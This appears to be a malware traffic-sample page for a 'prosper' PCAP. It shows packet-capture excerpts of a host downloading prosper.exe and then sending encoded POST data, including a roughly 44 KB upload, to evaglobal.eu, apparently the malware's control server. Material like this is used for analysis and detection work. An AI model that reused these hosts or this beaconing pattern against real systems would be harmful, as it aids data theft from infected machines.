Text Example

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

Attachment: 1 pcap, "prosper". Date added: May 30, 2019 7:30 am. Added by: admin. File size: 5 MB.

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1
GET /prosper.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1
POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-30 00:42:15.211255 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 7301:8379, ack 276, win 30016, length 1078: HTTP
2019-05-30 00:42:17.098581 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 4477439:4478073, ack 276, win 30016, length 634: HTTP

2019-05-30 00:42:21.556290 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 276:445, ack 4478073, win 64240, length 169: HTTP: POST /prosper/index.php HTTP/1.1
POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 44579
Cache-Control: no-cache
